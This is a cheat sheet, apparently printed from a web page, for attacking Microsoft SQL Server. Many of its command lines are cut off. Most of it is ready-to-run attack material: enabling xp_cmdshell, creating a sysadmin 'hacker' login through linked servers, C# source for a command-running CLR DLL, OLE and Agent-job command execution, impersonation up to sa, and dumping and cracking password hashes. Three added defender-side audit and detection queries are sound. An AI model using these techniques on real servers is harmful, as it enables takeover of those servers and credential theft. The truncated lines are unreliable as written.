MSSQL Server Cheat Sheet for Security Engineers 11/11/2023, 10:47

MSSQL Server Cheat Sheet for Security Engineers

Summary

Tools
Identify Instances and Databases
Discover Local SQL Server Instances
Discover Domain SQL Server Instances
Discover Remote SQL Server Instances
Identify Encrypted databases
Version Query
Identify Sensitive Information
Get Tables from a Specific Database
Gather 5 Entries from Each Column
Gather 5 Entries from a Specific Table

https://md2pdf.netlify.app/ Page 1 of 17

Dump common information from server to files


Linked Database
Find Trusted Link
Execute Query Through The Link
Crawl Links for Instances in the Domain
Crawl Links for a Specific Instance
Query Version of Linked Database
Execute Procedure on Linked Database
Determine Names of Linked Databases
Determine All the Tables Names from a Selected Linked Database
Gather the Top 5 Columns from a Selected Linked Table
Gather Entries from a Selected Linked Column
Command Execution via xp_cmdshell
Extended Stored Procedure
Add the extended stored procedure and list extended stored procedures
CLR Assemblies
Execute commands using CLR assembly
Manually creating a CLR DLL and importing it
OLE Automation
Execute commands using OLE automation procedures
Agent Jobs
Execute commands through SQL Agent Job service
List All Jobs
External Scripts
Python
R
Audit Checks
Find and exploit impersonation opportunities
Find databases that have been configured as trustworthy
Manual SQL Server Queries
Query Current User & determine if the user is a sysadmin
Current Role
Current DB
List all tables


List all databases


All Logins on Server
All Database Users for a Database
List All Sysadmins
List All Database Roles
Effective Permissions from the Server
Effective Permissions from the Database
Find SQL Server Logins Which can be Impersonated for the Current Database
Exploiting Impersonation
Exploiting Nested Impersonation
MSSQL Accounts and Hashes
References

Tools

NetSPI/PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server
skahwah/SQLRecon - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.

Identify Instances and Databases

Discover Local SQL Server Instances

Get-SQLInstanceLocal

Discover Domain SQL Server Instances

Get-SQLInstanceDomain -Verbose
# Get Server Info for Found Instances
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
# Get Database Names
Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults

Discover Remote SQL Server Instances


Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1

Identify Encrypted databases


Note: These are automatically decrypted for admins

Get-SQLDatabase -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance

Version Query

Get-SQLInstanceDomain | Get-SQLQuery -Query "select @@version"

Identify Sensitive Information

Get Tables from a Specific Database

Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DBNameFromGet-SQLDatabaseCommand> -

Get Column Details from a Table

Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DBName> -TableName <TableName>

Gather 5 Entries from Each Column

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<columnname1,columnname2,col

Gather 5 Entries from a Specific Table

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query 'select TOP 5 * from <Databas

Dump common information from server to files


Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv

Linked Database

Find Trusted Link

select * from master..sysservers

Execute Query Through The Link

-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');

-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@

-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')

-- create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOM
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINI

Crawl Links for Instances in the Domain


A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results

Get-SQLInstanceDomain | Get-SQLServerLink -Verbose


select * from master..sysservers

Crawl Links for a Specific Instance

Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
select * from openquery("<instance>",'select * from openquery("<instance2>",''select *


Query Version of Linked Database

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Execute Procedure on Linked Database

SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";

Determine Names of Linked Databases


tempdb, model and msdb are default databases and usually not worth looking into. master is also a default database but may contain something useful; anything else is custom and definitely worth digging into. The result is DatabaseName, which feeds into the following query.

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Determine All the Tables Names from a Selected Linked Database


The result is TableName, which feeds into the following query.

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Gather the Top 5 Columns from a Selected Linked Table


The results are ColumnName and ColumnValue, which feed into the following query.

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D


Gather Entries from a Selected Linked Column

Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<D

Command Execution via xp_cmdshell

xp_cmdshell has been disabled by default since SQL Server 2005.

PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAM

# Creates and adds local user backup to the local administrators group:
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAM
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAM

Manually execute the SQL query

EXEC xp_cmdshell 'net user';
EXEC master..xp_cmdshell 'whoami';
EXEC master.dbo.xp_cmdshell 'cmd.exe /c dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

If you need to reactivate xp_cmdshell (disabled by default since SQL Server 2005):

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

If the procedure was uninstalled

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

Extended Stored Procedure

Add the extended stored procedure and list extended stored procedures

# Create evil DLL


Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -

# Load the DLL and call xp_test
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>"
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>"

# List existing extended stored procedures
Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose

Build a DLL using xp_evil_template.cpp

Load the DLL

-- can also be loaded from UNC path or Webdav
sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
EXEC xp_calc
sp_dropextendedproc 'xp_calc'

CLR Assemblies

Prerequisites (any one of):

sysadmin privileges
CREATE ASSEMBLY permission
ALTER ASSEMBLY permission

The execution takes place with the privileges of the service account.

Execute commands using CLR assembly

# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desk

# Execute command using CLR assembly
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "who
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInsta
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInsta

# List all the stored procedures added using CLR
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose


Manually creating a CLR DLL and importing it


Save the following C# source as c:\temp\cmd_exec.cs and compile it into a DLL with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void cmd_exec (SqlString execCommand)
    {
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();

        // Create the record and specify the metadata for the columns.
        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NV

        // Mark the beginning of the result set.
        SqlContext.Pipe.SendResultsStart(record);

        // Set values for each column in the row
        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

        // Send the row back to the client.
        SqlContext.Pipe.SendResultsRow(record);

        // Mark the end of the result set.
        SqlContext.Pipe.SendResultsEnd();

        proc.WaitForExit();
        proc.Close();
    }
};


Then follow these instructions:

1. Enable show advanced options on the server

sp_configure 'show advanced options',1;
RECONFIGURE
GO

2. Enable CLR on the server

sp_configure 'clr enabled',1
RECONFIGURE
GO

3. Import the assembly

CREATE ASSEMBLY my_assembly
FROM 'c:\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;

4. Link the assembly to a stored procedure

CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my
GO

5. Execute and clean

cmd_exec 'whoami'
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly

CREATE ASSEMBLY will also accept a hexadecimal string representation of a CLR DLL:

CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM
0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE
GO


OLE Automation

:warning: Disabled by default


The execution takes place with the privileges of the service account.

Execute commands using OLE automation procedures

Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInsta

-- Enable OLE Automation
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'OLE Automation Procedures', 1;
RECONFIGURE;

-- Execute commands
DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'

# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py
python3 mssqlclient.py 'host/username:[email protected]' -install -clr Microsoft.Sql
python3 mssqlclient.py 'host/username:[email protected]' -check -reciclador 'C:\wind
python3 mssqlclient.py 'host/username:[email protected]' -start -reciclador 'C:\wind
SQL> enable_ole
SQL> upload reciclador.dll C:\windows\temp\reciclador.dll

Agent Jobs

The execution takes place with the privileges of the SQL Server Agent service account if a proxy account is not configured.
:warning: Requires sysadmin, or the SQLAgentUserRole, SQLAgentReaderRole and SQLAgentOperatorRole roles, to create a job.

Execute commands through SQL Agent Job service


Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Inst

Subsystem options:
-Subsystem CmdExec
-Subsystem PowerShell
-Subsystem VBScript
-Subsystem Jscript

USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';

-- delete
EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';

List All Jobs

SELECT job_id, [name] FROM msdb.dbo.sysjobs;
SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command,
Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password12
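The same job inventory from the defender's side, as added T-SQL that is not part of the original cheat sheet or of PowerUpSQL: every step using the CmdExec, PowerShell or ActiveScripting (VBScript/JScript) subsystem listed above, with the job owner and the proxy account, or its absence, that decides whose privileges the step runs with. It assumes read access to msdb.

```sql
-- Added defender-side check (not from the original cheat sheet). Assumes read
-- access to msdb. Flags job steps that run outside T-SQL and any job created
-- in the last 7 days, so an ad-hoc job like test_powershell_job1 stands out.
SELECT j.name AS job_name,
       j.enabled,
       SUSER_SNAME(j.owner_sid) AS job_owner,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(j.owner_sid)) AS owner_is_sysadmin,
       s.step_id,
       s.step_name,
       s.subsystem,                       -- CmdExec / PowerShell / ActiveScripting
       -- no proxy means the step runs as the SQL Server Agent service account
       COALESCE(p.name, '(none: runs as the Agent service account)') AS proxy_account,
       j.date_created,
       j.date_modified,
       LEFT(s.command, 200) AS command_preview
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
LEFT JOIN msdb.dbo.sysproxies AS p ON p.proxy_id = s.proxy_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell', 'ActiveScripting')
   OR j.date_created > DATEADD(day, -7, SYSDATETIME())
ORDER BY j.date_created DESC, j.name, s.step_id;
```

Schedule it or compare its output against a known-good baseline; a new CmdExec or PowerShell step owned by a sysadmin with no proxy is exactly what the Invoke-SQLOSCmdAgentJob call above leaves behind until sp_delete_job runs.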

External Scripts

:warning: You need to enable external scripts.

sp_configure 'external scripts enabled', 1;
RECONFIGURE;

Python:

Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBIn

EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = su
WITH RESULT SETS (([cmd_out] nvarchar(max)))

R:

Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstanc

EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(sy
WITH RESULT SETS (([cmd_out] text));
GO

@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'

Audit Checks

Find and exploit impersonation opportunities


Impersonate a login: EXECUTE AS LOGIN = 'sa'
Impersonate dbo with db_owner membership:

SQL> select is_member('db_owner');
SQL> execute as user = 'dbo'
SQL> SELECT is_srvrolemember('sysadmin')

Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBS

# impersonate sa account
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN =

Find databases that have been configured as trustworthy

Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_o

The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and the ability to connect outbound.

Invoke-SQLAuditPrivXpDirtree
Invoke-SQLUncPathInjection
Invoke-SQLAuditPrivXpFileexist
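A read-only review of the weak points this sheet exercises, as added T-SQL that is not part of the original cheat sheet or of PowerUpSQL; it assumes sysadmin rights on the instance being reviewed. It goes beyond the two checks above: the sp_configure options from the xp_cmdshell, CLR, OLE Automation and External Scripts sections, TRUSTWORTHY databases, IMPERSONATE grants, linked-server login mappings, and extended procedures or CLR assemblies loaded from outside the product.

```sql
-- Added defender-side audit (not from the original cheat sheet or PowerUpSQL).
-- Assumes a sysadmin-level reviewer; every query below is read-only.

-- 1. Server options the techniques above switch on. All should report 0,
--    except 'clr strict security' (SQL Server 2017+), which should be 1.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'clr enabled', 'Ole Automation Procedures',
               'external scripts enabled', 'Ad Hoc Distributed Queries',
               'clr strict security')
ORDER BY name;

-- 2. TRUSTWORTHY databases owned by a sysadmin: a db_owner there can reach sysadmin.
SELECT d.name AS database_name,
       SUSER_SNAME(d.owner_sid) AS database_owner,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb';                      -- msdb is TRUSTWORTHY by design

-- 3. Server-level IMPERSONATE grants: who may EXECUTE AS LOGIN whom.
--    major_id is the login being impersonated when class is SERVER_PRINCIPAL.
SELECT grantee.name AS grantee_login,
       target.name  AS impersonated_login,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state_desc = 'GRANT';

-- 4. Linked servers whose login mapping hands callers a fixed remote login or
--    passes their own credentials through (the "trusted link" openquery relies on).
SELECT s.name AS linked_server, s.data_source,
       CASE WHEN ll.local_principal_id = 0 THEN '(all other logins)'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
       ll.uses_self_credential, ll.remote_name,
       s.is_rpc_out_enabled, s.is_data_access_enabled
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
  AND (ll.remote_name IS NOT NULL OR ll.uses_self_credential = 1)
ORDER BY s.name;

-- 5. Extended stored procedures registered with an explicit DLL path.
--    Built-ins use a bare file name; a drive or UNC path is a red flag.
SELECT OBJECT_NAME(xp.object_id, DB_ID('master')) AS procedure_name, xp.dll_name
FROM master.sys.extended_procedures AS xp
WHERE xp.dll_name LIKE '%\%' OR xp.dll_name LIKE '%/%';

-- 6. CLR assemblies in the current database loaded above SAFE.
SELECT name, permission_set_desc, create_date, modify_date
FROM sys.assemblies
WHERE is_user_defined = 1
  AND permission_set_desc IN ('EXTERNAL_ACCESS', 'UNSAFE_ACCESS');
```

Run section 6 in each user database (sys.assemblies is per database); the other sections are server-wide.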

Manual SQL Server Queries

Query Current User & determine if the user is a sysadmin

select suser_sname()
Select system_user
select is_srvrolemember('sysadmin')

Current Role

Select user

Current DB

select db_name()

List all tables

select table_name from information_schema.tables

List all databases

select name from master..sysdatabases

All Logins on Server

Select * from sys.server_principals where type_desc != 'SERVER_ROLE'


All Database Users for a Database

Select * from sys.database_principals where type_desc != 'database_role';

List All Sysadmins

SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('s

List All Database Roles

SELECT DB1.name AS DatabaseRoleName,
       isnull (DB2.name, 'No members') AS DatabaseUserName
FROM sys.database_role_members AS DRM
RIGHT OUTER JOIN sys.database_principals AS DB1
    ON DRM.role_principal_id = DB1.principal_id
LEFT OUTER JOIN sys.database_principals AS DB2
    ON DRM.member_principal_id = DB2.principal_id
WHERE DB1.type = 'R'
ORDER BY DB1.name;

Effective Permissions from the Server

select * from fn_my_permissions(null, 'server');

Effective Permissions from the Database

SELECT * FROM fn_my_permissions(NULL, 'DATABASE');

Find SQL Server Logins Which can be Impersonated for the Current Database

select distinct b.name
from sys.server_permissions a
inner join sys.server_principals b
    on a.grantor_principal_id = b.principal_id
where a.permission_name = 'impersonate'

Exploiting Impersonation

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'adminuser'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()

Exploiting Nested Impersonation

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'stduser'
SELECT SYSTEM_USER
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
SELECT SYSTEM_USER
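Recording the actions shown in this section and in the linked-server section (EXECUTE AS LOGIN, CREATE LOGIN, sp_addsrvrolemember, permission grants, server setting changes) with SQL Server Audit, as an added defender-side example that is not part of the original cheat sheet. The audit and specification names and the C:\SQLAudit\ path are placeholders.

```sql
-- Added detection example (not from the original cheat sheet). The audit name,
-- specification name and C:\SQLAudit\ are placeholders; the Database Engine
-- service account must be able to write to that directory.
USE master;
GO
CREATE SERVER AUDIT [privilege_abuse_audit]
TO FILE (FILEPATH = N'C:\SQLAudit\', MAXSIZE = 256 MB, MAX_ROLLOVER_FILES = 20)
WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
GO
CREATE SERVER AUDIT SPECIFICATION [privilege_abuse_spec]
FOR SERVER AUDIT [privilege_abuse_audit]
    ADD (SERVER_PRINCIPAL_IMPERSONATION_GROUP),  -- EXECUTE AS LOGIN, nested or not
    ADD (SERVER_PRINCIPAL_CHANGE_GROUP),         -- CREATE / ALTER / DROP LOGIN
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),       -- sp_addsrvrolemember ... sysadmin
    ADD (SERVER_PERMISSION_CHANGE_GROUP),        -- GRANT IMPERSONATE and similar
    ADD (SERVER_OBJECT_CHANGE_GROUP),            -- CREATE / ALTER / DROP on server objects
    ADD (SERVER_OPERATION_GROUP)                 -- altering server settings, external access
WITH (STATE = ON);
GO
ALTER SERVER AUDIT [privilege_abuse_audit] WITH (STATE = ON);
GO

-- Review: who did what, and on whose behalf. While a session runs under
-- EXECUTE AS LOGIN, session_server_principal_name still holds the original
-- login, so a chain like stduser -> sa is visible even though SYSTEM_USER
-- inside the session reports 'sa'.
SELECT event_time, action_id, succeeded,
       session_server_principal_name AS original_login,
       server_principal_name         AS effective_login,
       target_server_principal_name  AS target_login,
       object_name, statement
FROM sys.fn_get_audit_file(N'C:\SQLAudit\*', DEFAULT, DEFAULT)
ORDER BY event_time DESC;
```

The same review query run on the linked target shows the login creation and sysadmin role change that arrive there through EXECUTE ... AT, attributed to the mapped remote login rather than to the user who sent them.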

MSSQL Accounts and Hashes

MSSQL 2000:

SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to co

MSSQL 2005:

SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_log

Then crack passwords using Hashcat:

hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force

Hashcat modes (mode, SQL Server version, example hash):

131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972
132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8f

References

PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt
PowerUpSQL Cheat Sheet - Scott Sutherland
Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13, 2017
MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016
